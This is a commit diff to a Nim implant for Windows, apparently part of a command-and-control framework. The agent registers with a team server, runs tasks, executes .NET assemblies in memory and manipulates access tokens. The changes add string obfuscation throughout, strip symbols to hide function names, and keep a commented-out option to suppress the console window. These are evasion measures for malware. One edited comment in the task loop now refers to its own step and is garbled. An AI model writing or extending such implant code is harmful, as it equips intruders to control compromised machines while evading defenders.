Small changes.

src/agent/core/clr.nim

@@ -1,5 +1,4 @@
 import winim/[lean, clr]
-import os
 import ../utils/[hwbp, io]
 import ../../common/utils
 
@@ -60,7 +59,7 @@ proc dotnetInlineExecuteGetOutput*(assemblyBytes: seq[byte], arguments: seq[stri
     # Create AppDomain
     let appDomainType = mscorlib.GetType(protect("System.AppDomain"))
     let domainSetup = mscorlib.new(protect("System.AppDomainSetup"))
-    domainSetup.ApplicationBase = getCurrentDir() 
+    domainSetup.ApplicationBase = protect("C:/Windows/System32") 
     domainSetup.DisallowBindingRedirects = false
     domainSetup.DisallowCodeDownload = true
     domainSetup.ShadowCopyFiles = protect("false")

src/agent/core/context.nim

@@ -1,4 +1,4 @@
-import parsetoml, system
+import parsetoml
 import ../utils/io
 import ../../common/[types, utils, crypto, serialize]
 

src/agent/core/process.nim

@@ -1,7 +1,7 @@
 import winim/lean 
-import strutils, strformat, tables, algorithm
+import tables
 import ../utils/io
-import ../../common/[types, utils]
+import ../../common/utils
 import token
 
 type 

src/agent/core/token.nim

@@ -1,7 +1,7 @@
 import winim/lean 
 import strformat
 import ../utils/io
-import ../../common/[types, utils]
+import ../../common/utils
 
 #[
     Token impersonation & manipulation 
@@ -176,7 +176,7 @@ proc getTokenGroups(hToken: HANDLE, apis: Apis = initApis()): string =
         groupCount = pGroups.GroupCount
         groups = cast[ptr UncheckedArray[SID_AND_ATTRIBUTES]](addr pGroups.Groups[0])
 
-    result &= fmt"Group memberships ({groupCount})" & "\n"
+    result &= protect("Group memberships (") & $groupCount & protect(")\n")
     for i, group in groups.toOpenArray(0, int(groupCount) - 1): 
         result &= fmt" - {sidToString(group.Sid, apis):<50} {sidToName(group.Sid)}" & "\n"
 
@@ -203,9 +203,9 @@ proc getTokenPrivileges(hToken: HANDLE, apis: Apis = initApis()): string =
         privCount = pPrivileges.PrivilegeCount
         privs = cast[ptr UncheckedArray[LUID_AND_ATTRIBUTES]](addr pPrivileges.Privileges[0])
 
-    result &= fmt"Privileges ({privCount})" & "\n"
+    result &= protect("Privileges (") & $privCount & protect(")\n")
     for i, priv in privs.toOpenArray(0, int(privCount) - 1):
-        let enabled = if priv.Attributes and SE_PRIVILEGE_ENABLED: "Enabled" else: "Disabled" 
+        let enabled = if priv.Attributes and SE_PRIVILEGE_ENABLED: protect("Enabled") else: protect("Disabled") 
         result &= fmt" - {privilegeToString(addr priv.Luid):<50} {enabled}" & "\n"
 
 
@@ -213,15 +213,15 @@ proc getTokenInfo*(hToken: HANDLE): string =
     let apis = initApis() 
 
     let (tokenId, tokenType) = getTokenStatistics(hToken, apis)
-    result &= fmt"TokenID:  0x{tokenId}" & "\n"
+    result &= protect("TokenID:  0x") & tokenId & "\n"
-    result &= fmt"Type:     {tokenType}" & "\n"
+    result &= protect("Type:     ") & tokenType & "\n"
  
     let (username, sid) = getTokenUser(hToken, apis)
-    result &= fmt"User:     {username}" & "\n"
+    result &= protect("User:     ") & username & "\n"
-    result &= fmt"SID:      {sid}" & "\n"
+    result &= protect("SID:      ") & sid & "\n"
     
     let isElevated = getTokenElevation(hToken, apis)
-    result &= fmt"Elevated: {$isElevated}" & "\n"
+    result &= protect("Elevated: ") & $isElevated & "\n"
 
     result &= getTokenGroups(hToken, apis)
     result &= getTokenPrivileges(hToken, apis)

src/agent/main.nim

@@ -19,7 +19,7 @@ proc main() =
         3. Register to the team server if not already connected
         4. Retrieve tasks via checkin request to a GET endpoint
         5. Execute task and post result
-        6. If additional tasks have been fetched, go to 3.
+        6. If additional tasks have been fetched, go to 6.
         7. If no more tasks need to be executed, go to 1. 
     ]#
     while true: 

src/agent/nim.cfg

@@ -2,7 +2,8 @@
 -d:agent
 -d:release
 --opt:size
---passL:"-s" # Strip symbols, such as sensitive function names
+--l:"-Wl,-s"
+# --l:"-Wl,-subsystem,windows" # Prevent console window
 -d:CONFIGURATION="PLACEHOLDERAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAPLACEHOLDER"
 -d:MODULES="511"
 -d:VERBOSE="true"

src/agent/protocol/registration.nim

@@ -99,7 +99,7 @@ type
         productType: ProductType
         name: string
 
-const VERSIONS = [
+let versions = [
     # Windows 11 / Server 2022+
     # WindowsVersion(major: 10, minor: 0, buildMin: 22631, buildMax: 0, productType: WORKSTATION, name: protect("Windows 11 23H2")),
     # WindowsVersion(major: 10, minor: 0, buildMin: 22621, buildMax: 22630, productType: WORKSTATION, name: protect("Windows 11 22H2")),
@@ -135,7 +135,7 @@ const VERSIONS = [
     WindowsVersion(major: 5, minor: 1, buildMin: 0, buildMax: 0, productType: WORKSTATION, name: protect("Windows XP")),
 ]
 
-proc matchesVersion(version: WindowsVersion, info: OSVersionInfoExW, productType: ProductType): bool = 
+proc matchVersion(version: WindowsVersion, info: OSVersionInfoExW, productType: ProductType): bool = 
     if info.dwMajorVersion != version.major or info.dwMinorVersion != version.minor: 
         return false 
     if productType != version.productType: 
@@ -147,8 +147,8 @@ proc matchesVersion(version: WindowsVersion, info: OSVersionInfoExW, productType
     return true
 
 proc getWindowsVersion(info: OSVersionInfoExW, productType: ProductType): string = 
-    for version in VERSIONS: 
+    for version in versions: 
-        if version.matchesVersion(info, if productType == DC: SERVER else: productType): # Process domain controllers as servers, otherwise they show up as unknown
+        if version.matchVersion(info, if productType == DC: SERVER else: productType): # Process domain controllers as servers, otherwise they show up as unknown
             if productType == DC:
                 return version.name & protect(" (Domain Controller)")
             else: